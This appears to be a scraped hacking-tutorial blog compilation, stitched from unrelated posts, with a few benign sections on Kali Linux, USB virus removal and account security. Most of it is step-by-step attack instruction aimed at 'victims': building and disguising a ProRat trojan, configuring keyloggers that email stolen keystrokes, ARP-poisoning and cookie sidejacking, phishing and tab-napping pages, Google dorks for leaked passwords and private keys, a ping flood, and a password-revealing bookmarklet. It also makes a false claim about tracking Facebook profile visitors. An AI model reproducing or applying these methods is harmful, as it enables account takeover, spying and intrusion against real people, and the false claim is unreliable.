Kali Linux 2.0 Release Day Scheduled

 Kali Linux News

We’ve been awfully quiet lately, which usually means something is brewing below the surface. In the past few months we’ve been working feverishly on our next generation of Kali Linux and we’re really happy with how it’s looking so far. There’s a lot of new features and interesting new aspects to this updated version, however we’ll keep our mouths shut until we’re done with the release. We won’t leave you completely hanging though…here’s a small teaser of things to come!

Kali 2.0 Teaser – Kali Sana! from Offensive Security

Kali 2.0 Dojo at Black Hat & DEF CON Las Vegas, 2015

If you’re heading down to Black Hat Vegas 2015, join our free Kali 2.0 Dojo workshop, where we will be showcasing some of the most awesome features in Kali 2.0. We are currently working to bring everyone a surprise appearance at DEF CON as well. Unleash the Kraken!

How to Remove Shortcut Virus From Pendrive / USB Drive

If your USB drive don’t have important files you can try to Format it, but if it contains important files then you are not going to format it, to Remove Shortcut Virus follow the Steps Below.
Step 1. Go to Start and Search for cmd , as it appears in start menu Right Click on it and Click on “Run as Administrator“
Step 2. Navigate to Flash Drive by typing its letter. [ Lets Say it is i ], to find your USB drive letter open “My Computer” and check for letter, type i: and hit enter.
Step 3. Type ” del *.lnk ” (without quote) in cmd window and Hit Enter on your Keyboard.
Step 4. Now type ” attrib -s -r -h *.* /s /d /l ” ( without quote ) and hit Enter .

It will take few seconds to recover all your files, Now open your Flash Drive you will get Back all of your files.
Once you recover files into USB drive you can use them but if you again plug in USB Flash drive into infected computer your flash drive will infect again, so it is better to remove source of this virus i,e infected computer, follow the steps below to remove shortcut virus from computer.
Step 1. First open Task Manager by pressing Ctrl + Alt + del Or Right Click on taskbar and click on Task manager.
Step 2. Go to Process tab and look for process Wscript.exe , Scroll down and find any such process, Now Right Click on it and Click on End Task.
Step 3. Now go to Start and search for “regedit” , open it you will get Registry Editor navigate to
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Run
Here look for Registry Key “XYZ name” if found then right click on it and delete this registry key. This will remove Shortcut Virus from your Computer, if not then try these steps.

1. Press windows + R key, you will get Run box, type %temp% here and hit OK, now temp folder will be open look for file xyz.vbs or xyz.exe or any kind of script and delete it.

2. Go to C:\Users\\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup. Check Startup folder if xyz.vbs exist here then delete it.

Trace Your Facebook Profile Visitors

To know who recently visited your profile.

Step 1) Go to your Facebook Profile Page.

Step 2) Now Press Ctrl + U from your keyboard for see source code of your profile page.

Step 3) Now press Ctrl + F from your keyboard to open search box.

Step 4) Now search this code {"list":

Step 5) You find some Facebook Profile Ids are like shown below.

Step 6) There are some Facebook Profile Ids of your friends who visited recently.

Step 7) The first one ID's are showing visits the most number of time.

Step 8) Now if your want to findout, Open a new tab Enter below link :

www.facebook.com/Facebook Profile Id

For Example : www.facebook.com/--------59

Cain & Abel

You are now ready to use the sniffer to get the passwords of the people who are on the same network as you. This is unbelievably simple and also warns us of the dangers we are prone to while we are on a network.

Make sure that you've configured Cain before moving on to read this article. If you still haven't configured it, look at the links at the bottom of this article.

So here is what you have to do:

1)Open Cain and first of all click on the 'Start sniffer' button in the right top corner of your screen beside the radioactivity sign button. Don't worry you're just activating the sniffer.

2)Now click on the sniffer tab. It should be blank if you're using it for the first time.

3)Right click and select 'Scan for MAC addresses' and without touching anything click OK.

4)Now you have a list of IP addresses and MAC addresses on your network.

5)Now click on 'APR' tab at the bottom beside the 'hosts' tab.

6)The function of APR is to Hijack the network traffic and pass it through your computer.

7)Now single click in the upper segment of the empty form-like space on the right side of the window.

8)Click on the blue PLUS sign (+) on the top which is meant to add new addresses to poison and sniff.

9)Here, on the left side you have a list of available addresses. I prefer selecting the address of the router so select the address of the router and then on the right side select the addresses of the computers you want to sniff. You can choose as many computers as you like.

10)Now just click okay and you'll see that address listed in the upper segment of your screen.

11)Select the addresses with your mouse and click on the 'Start APR' button which appears like a radioactivity sign.

12)Bingo! You just started sniffing and poisoning the network.

13)Now click on the 'Passwords' tab at the bottom and here you have a list of all the activity going on and you can sneak the passwords from here.

14)For web passwords see the HTTP tab and if you want the login information just click on 'SMB' on the left side of your screen where there is a list of the type of passwords available.

15)From here, select the password you want to crack, right click it and send it to the cracker.

Hack Remote PC Using Prorat

STEP 1. First of all Download ProRat from here. Once it is downloaded extract it. A password prompt will come up. Enter the password.The password "pro".

STEP 2. Open up the program and You should see the following window.

STEP 3. Click on the "Create" button in the bottom. Choose "Create ProRat Server".

STEP 4. Next put your IP address so the server could connect to you. You need not enter your IP address manually, you can do this by just clicking on the little arrow.It automatically fills your IP address. Next put in your e-mail so that when and if a victim gets infected it will send you an email.

STEP 5. Now Open General settings. This tab is the most important tab. In the check boxes, we will choose the server port the program will connect through, the password you will be asked to enter when the victim is infected and you wish to connect with them, and the victim name. As you can see ProRat has the ability to disable the windows firewall and hide itself from being displayed in the task manager. Just follow the steps as shown in the figure.

STEP 6. Click on the Bind with File button to continue. Here you will have the option to bind the trojan server file with another file. You can select an image, text file or pdf file, So as to make the victim trust your file.

STEP 7. Click on the Server Extensions button to continue. Here you choose what kind of server file to generate. I prefer using .exe files.

STEP 8. Click on Server Icon to continue. Here you will choose an icon for your server file to have. The icons help mask what the file actually is.

STEP 9. After this, press Create server, your server will be in the same folder as ProRat. Start giving this file to your victim. When the victim double click the file, his computer will be in your control.

STEP 10. Now the hacker has lot of options to choose from. He can do many funny things with the victim’s computer.

DDOS Attack Manually

Open Cmd From Run => Cmd
Now Follow These Steps -:

1. Now Type This Command In CMD :

Ping www.anysite.com

And You Will Get The I.P of Victim

2. Now Type =>

ping (i.p of site) –t –l 65000

here 65000 is packets

Now Your PC Will Send A Huge Traffic To That Site…:D

Check That Site After 1 Hours it will be Down..!!!

Try This From More PC For A Good Response..!!!

DDOS Attack Basic Tutorial

What is DoS Attack ?
Denial of Service(DoS) Attack is a fatal attempt by an external agent to cause a situation where the actual resource(victim undergoing attack) becomes unavailable to the actual visitors or users. This is usually done by overwhelming the target victim with illegitimate traffic in the form of broken/unsolicited page access requests.

Distributed Denial of Service(DDoS) Attack is an advance form of DoS where the attacking agents are distributed over the huge network (or internet)

How DoS Attacks are executed ?
DoS Attacks are usually executed by flooding the target servers with unsolicited data packets in unprecedented manner. This may be done by misconfiguring network routers or by performing smurf attack on the victim servers. This results in, Capacity Overflow‟, followed by Max Out of system resources, which makes the target service unavailable, either temporarily or permanently(In case of hardware targeted DoS attack) to the intended users.
In case of DDoS attack, the origin of unsolicited data packets (for the purpose off looding the bandwidth/resource of the victim servers) are distributed over a large network(or internet).
The overall mechanism of DDoS Attack involves a huge quantity of compromised network nodes (computers connected to internet), governed by agent handlers, which are further controlled centrally by the actual attacker.

The massive number of compromised computers on the internet are then unknowingly governed by the source attacker to demand access to the targeted victim within a minimal time span, which further causes saturation of limited system resources and results in eventual shutdown of the targeted service.

The most common method employed to compromise massive amount of user agents on the internet (to actually execute DDoS Attack) is by plaguing as many computers as possible over the internet with malware/trojan, meant for that particular purpose. Such trojans can either spread via email attachments or via Peer-to-peer networks. Whatever be the method of spreading out, once the intended trojan is silently installed on the uninformed computer agent, that user agent has actually been compromised, which is then called as a Zombie or Botnet.

Further, it becomes a prerogative of the source attacker to indirectly command some or all its Zombie agents(or botnets) for demanding access to the target service.

What are other variants of DoS attacks ?
There are many other attacks of similar nature and purpose such as smurf attack, nuke bomb, ping of death, banana attack, phlashing among many others.

How are they counteracted ?
The best way to defend a web service from faltering due to DDoS attack is to keep backup resources of the system intact. As the aim of such attack is to max out system resources, if the system resources are already abundant and well prepared to face that sudden peak of traffic at any moment, most chances are that your web service will survive DoS (or even DDoS) attack.

What implications can DDoS Attacks have ?
If the attack is only limited to overwhelming and resource consuming traffic, the implications are limited to service unavailability for couple of hours (or few days in exceptional cases). This not only stresses the website administrators financially but also results in loss of market reputation and puts a question mark on the reliability of the web service.

In case of hardware targeted DoS Attacks, financial losses can magnify to great extent as hosting infrastructure has to be replaced on urgent basis. This can also lead to critical data loss, if backup procedures aren‟t up to the mark.With more and more DDoS attacks happening these days, companies and Internet properties are using various types of DDoS Mitigation strategies to avoid any worst case scenario.

Ping

Ping is part of ICMP (Internet Control Message Protocol) which is used to troubleshoot TCP/IP networks. So, Ping is basically a command that allows you to check whether the host is alive or not.
To ping a particular host the syntax is (at command prompt)--

c:/>ping hostname.com

example:- c:/>ping www.google.com

Various attributes used with 'Ping' command and their usage can be viewed by just typing c:/>ping at the command prompt.

Set up Your own Hacking Lab

There is a open source project Damn Vulnerable Web App (DVWA).Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable. Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and aid teachers/students to teach/learn web application security in a class room environment. Now you need an XAMPP server to install this application.

Insatlling XAMPP Server

=> Download the XAMPP server
Download
=> Locate the installed folder and go to htdocs.

=> Now extract the contents of downloaded file to htdocs folder.
=> Open any browser and type localhost/foldername

Set up DVWA:

A log in screen will appear.

Log in with username as "admin" and password as "password".

After that you will be greeted with its home page

Now you know what to do-Hack.Select the security level,try different attacks.It offers the following attacks:-
* Brute Force
* Command Execution
* CSRF
* Insecure Captcha
* File Inclusion
* Sql Injection
* Blind SQL Injection
* XSS Stored
* XSS Reflected

Tips To Secure Your Facebook Account

So if you are in Facebook and use Facebook for your business purpose, you know how important is your Facebook account. You must be alerted about the hackers who are consistently trying to hack Facebook accounts. They uses various black hat methods to get access of your account. When they succeed to do so, they post spams on your Wall which may bring down your reputation or make your profile spammy. You might be reading the stories titled as French President’s Facebook Page Hacked and Facebook Pulls CEO’s Page After Apparent Hacking. But you can secure your Facebook profile by following some To do and not To DOs so that they can’t get any scope to dig a trap for you. Well, here is some actions that you must take for your security and stability in Facebook.

Remove the Facebook Apps that you don’t trust When you give permission of accessing your data to an application, they hang on that permission forever. So you are actually running on danger zone if you do not know too much about the trustiness of the application. But some time we allow some applications to access our profile data for some instant benefit without knowing about them and we are pretty much lazy on the matter of removing the useless applications.

Some hackers drive in their road in a long-term vision, they can create some juicy applications and attract you to install them in your Facebook account. Later, they can use the permission given by you to hack your account. It is well enough to say that you must revoke the permission of those apps that you do not need any more or you don’t trust them. Learn how to delete the permissions that you previously allowed to an application in Facebook account from this video tutorial.

Enable SSL Settings for your Facebook account to be safe from Firesheep.In late of 2010, Codebutler, a developer released a Firefox add-on,named as Firesheep to use the security cookies for login verification of websites. You should be careful about this as the add-on has a security flaw with Wi-Fi network. Hackers can use this add-on to grab your login cookies trapping in the wireless network. So you must use SSL connection (https) when accessing your Facebook account in a Wi-Fi network connection. Learn how to enable SSL for Facebook. In order to enable SSL login to your Facebook account and click on the Account link at the top-right corner of the page. Then click on Account settings link in the drop down menu.

facebook-account-link Under the Settings tab scroll down to the Account security row and click on the Change link.change-facebook-account-security Click on the Browse Facebook on a secure connection (https) whenever possible check box and then Save button.facebook-enable-account-security Now whenever you will browse Facebook it will use the SSL (https)connection protocol.

Setup Facebook Login Email Alerts If some body manages to get your login information you should take aprompt action like changing your login password. So to get notified about if there any body log-ins to your account, setup Facebook loginemail alerts.Protect your information and privacy on Facebook Hackers are too much intelligent and try to crack your password bycollecting information about you from the Facebook account. So your must protect your information and secure your privacy on Facebook fornot to be hacked one day.

Facebook Password Decryptor

FacebookPasswordDecryptor is the FREE software to instantly recover stored Facebook account passwords stored by popular web browsers and messengers.Most of the applications store the Login passwords to prevent hassale of entering the password everytime by the user. Often these applications use their own proprietary encryption mechanism to store the login passwords including Facebook account passwords. FacebookPasswordDecryptor automatically crawls through each of these applications and instantly recovers the encrypted Facebook account password.

Tab Napping

Tab Napping: Tab Napping is new hacking trick through which you can't directly hack account and you will be using phishing method with tab napping then you can hack account. Actually Tab Napping is a script which you put into a site/blog and when the user visit your website/blog and read your article or play game or watch video, when user goto other tab in browser which contain other website like youtube, google etc and came back to your website then your website will be redirected to the phishing page and telling them to login with facebook/gmail/yahoo account to continue.When user enter login information he/she will be back to your page and user password will be send to you. So lets see how to hack facebook account using tab napping trick.

Steps:

1) First of all you have a web hosting (website) and if you don't have your own website then create Free website with following website : www.000webhost.com www.host1free.com www.my3gb.com or you can search on google and create an account.

2) Now download the script and phishing pages from google.

3) Extract it and you will see the files and folders may be like below :

4) Upload all the files and folders to your website.

5)The website contain a game and send your website address(your tab napping website where you upload all the files) to your friend or anyone else whose facebook account you want to hack and tell him/her that if your are intelligent or smart or say anything else then play this game and win it. The website look like this:

Actually the game is very dificult and he/she will not win in less time and he/she will goto another tab in browser like facebook,google,youtube ,yahoo etc and when he/she came back to the website , it will be automatically redirected and saying them to login with facebook account to continue,

then enjoy :-)

Cookie Stealing

What Are Cookies ? And What Is The Use Of Stealing Cookies ? Cookies are small files that stored on users computer by websites when a user visits them. The stored Cookies are used by the web server to identify and authenticate the user .For example when a user login in Facebook a unique string is generated and one copy of it is saved on the server and other is saved on the users browser as Cookies. Both are matched every time the user does any thing in his account So if we steal the victims cookie and inject them in our browser we will be able to imitate the victims identity to the web server and thus we will be able to login is his account . This is called as Side jacking .The best thing about this is that we need not no the victims id or password all we need is the victims cookie Hack Facebook / Twitter By Stealing Cookies Things we need :-
1. Ettercap or Cain and able for ARP poisoning the victim
2. Wire shark for sniffing and stealing cookies
3. Firefox browser and Cookie logger add on for injecting the stolen cookies in our browser

Procedure :

1. First ARP poison the victim .
2. After ARP poisoning open Wire shark ,click capture button from the menu bar ,then select interface .Now select your interface (usually eth0 ) finally click start capture .
3. Now you can see the packets being captured , wait for a while till the victim logs in his account( Facebook /twitter ),
4. Mean while Find the IP address of Facebook ,for this you can open CMD (command prompt ) and enter .Ping Facebook.com to find its IP address

5. Now filter the packets by entering the the IP address (Facebook) in the filter bar and click apply

6. Now Locate HTTP Get /home.php and copy all the cookie names and values in a note pad as shown

7. Now open Firefox and open add and edit cookies ,which we downloaded earlier , add all the cookie values and save them as shown
8. Now open Facebook in a new tab , you will be logged in the victims account .

Hacking FB Account Using Google Dork List

Prerequisites: (This one is Easy!)

1. A modern webbrowser and a internet.

2. Time

[Level:Beginner]

Method 1: Facebook!We will be using a google dork to find usernames and passwords of many accounts including Facebook! The Dork: intext:charset_test= email= default_persistent= Enter that into Google, and you will be presented with several sites that have username and passwords lists!

Method 2: WordPress! This will look for WordPress backup files Which do contain the passwords, and all data for the site!The Dork: filetype:sql inurl:wpcontent/ backup-*

Method 3: WWWBoard! This will look for the user and passwords of WWWBoard users.The Dork: inurl:/wwwboard/passwd.txt

Method 4: FrontPage! This will find all users and passwords, similar to above.The Dork: ext:pwd inurl:(service | authors | administrators | users) "# - FrontPage-"

Method 5: Symfony!This finds database information and loginsThe Dork: inurl:config/databases.yml -trac -trunk -"Google Code" -source -repository

Method 6: TeamSpeak! (big one!!!!!)This will search for the server.dbs file (a Sqlite database file With the SuperAdmin username and password!!!)The Dork: server-dbs "intitle:index of"

Method 7: TeamSpeak2!!! (also big!)This will find the log file which has the Super Admin user and pass in the Top 100 lines. Look for "superadmin account info:"The Dork:"inurl:Teamspeak2_RC2/server.log"

Method 8: Get Admin pass!Simple dork which looks for all types of admin infoThe Dork: "admin account info" filetype:log

Method 9: Private keys! (not any more!) This will find any .pem files which contain private keys.The Dork: filetype:pem pem intext:private And the Ultimate one, the regular directory full of passwords....

Method 10: The Dir of Passwords! Simple one!The Dork: intitle:"Index of..etc" passwd

keylogger

1. first you must have the emissary keylogger in your system. and Net Framework installed because keyloggers wont work without this.
2. Then you have to create fake account at google. its use is this when you hack a person his data will be mailed to your account.
3. when you do these too.Now open the the Emissary Keylogger.
4. their you can see Gmail User Name. and below it Gmail Password. Put the gmail account with password their because this will confirm itself that the mails have to sent for this account or not..
5.when you put their you can see Test Mail.. just click on it . it will be blink for a minute and then a window will appear and saying "Message has sent. Check your mail." then check your mail is their a message received from the emissary. if not then try again because you have entered the pass or id wrong.
6. After it below you can see Server Name in the bracket will be written "sever.exe" well you can change the name like Nav.exe..NOTe you can only change server but not .exe e.g.. Nav.exe.
7. Below that is Interval .. IT means that what you want in how much minutes the mail come to you from the victims pc. i like to give it because this is good.
8. At the End you can see Build Server. just click on it and i file will appear at your system by then name you have given in server name . and it will be at the same directory where the emissary keylogger is..
9. NOW the file is created with you.. Give that file to the victim who you want to hack If he opens it then he will be hacked..
10. If you are worried how can i gave them . Then post it to the free web hosting space like www.mediafire.com

Phising

The Oldest and Successful Method

First of all download the Facebook Phishing Page. Click Here Extract the zip file now you will get three files as given below:

* index.html
* log.txt
* login.php

Upload all the three files to any of the free Web hosting server. Some Free Web hosting servers are given below you can also find few more for yourself.

http://www.yourfreehosting.net/
http://www.esmartstart.com/

Once you have uploaded all the three files to web hosting server now you have to send these to your victim. Now After sending Phisher to victim, once the user logs in to his Facebook account using your Phisher, his user ID and password are ours...And these are stored in passes.txt what you have to do is just refresh your Web hosting account files.

Tips To Secure Your Gmail Account

Its simple, Currently when you want to login to any of your google accounts you will have to use just a username and password and if someone captures your password then your account can be compromised/blocked. So google said before you can directly login to your account you will have to provide username, password and additionally a verification code sent to your phone. that way the person knowing only your password cannot open ur account they will also need the verification code everytime they want to get access to ur account !!!

Follow the easy 9 steps with the pictures included below !!!

Step 1:

Click on settings

Step 2:

Select Accounts and Import and then select other google account settings

Step 3:

select 2-step verification

Step 4 :

click on button setup 2-setup verification

Step 5 :

Select the appropriate options like other--use another phone, country and Enter your cellphone number and select the options SMS text message

Step 6:

click on send code and you will receive the verification code on your phone number. Enter that code in the box provided and click verify. Once verified click next

Step 7 :

Copy the backup codes displayed on the screen and save it safely !!! These codes can be used instead of verification code if the google server or your phone provider delays the delivery of the verification code at the time of login into your google account. Once done, proceed to the next step

Step 8 :

Follow the instruction on the screen to add a back-up phone if you have (or use your family / friend's number ) that you can use in case your primary contact has any problem

Step 9 :

Click on Turn-on 2 step verification.

Gmail hacking by Google Password Decryptor

GooglePasswordDecryptor is the FREE tool to instantly recover stored Google account passwords by various Google applications as well as popular web browsers. Most of the Google's desktop applications such as GTalk, Picassa etc store the Google account passwords to prevent hassale of entering the password every time for the user.

How To View Password Behind *****

You can use this script when someone has checked the remember me button in the login form of any website and to reveal password from that saved asterisk or encrypted password.
After opening the web page paste the JavaScript given below in the address bar and hit enter

javascript:(function(){var%20s,F,j,f,i;%20s%20=%20%22%22;

%20F%20=%20document.forms;%20for(j=0;%20j
%20{%20f%20=%20F[j];%20for%20(i=0;%20i
%20{%20if%20(f[i].type.toLowerCase()%20==%20%22password%22)

%20s%20+=%20f[i].value%20+%20%22\n%22;%20}%20}%20if

%20(s)%20alert(%22Passwords%20in%20forms%20on%20this%20page:\n\n%22%20+%20s);

%20else%20alert(%22There%20are %20no%20passwords%20in%20forms%20on%20this%20page.%22);})();

Keylogger

Step 1) First Download Rin Logger Run the keylogger file on your pc and click on “Create new”

Step 2) Now, enter the information as follows:
Email address: your email address (gmail recommended) Account Password: Password of your Email address. Keylogger Recipients: Enter your Email address Click on next
Step 3) Now Enable the Attach Screenshots by hitting on it. Enter the duration (time in minutes) to receive email Key logs.
After that hit "verify now” If you get a message saying verified, your good to go, click next
Step 4) Now enable the “Install Keylogger” by clicking on it. Name the file anything you want and select Installation path as “Application Data”,
Step 5) Click on Next
Step 6) Now, “Enable Website Viewer” by clicking on it. Click on Next option
Step 7)Now, Enable the “Enable File Binder”. Click on next.
Step 8) Now Enable the “Steal Password” Click on Next
Step 9) Fill all the information by yourself. And click on next.
Step 10) Now, hit on “Save As” and select the location where you want to save your keylogger server file. And click on “Compile Server”. Now Compile has been done.
You have successfully created a keylogger server file. Now, simply send this file to your victim via email, once the victim runs our keylogger, we will key logs every 10 min via email.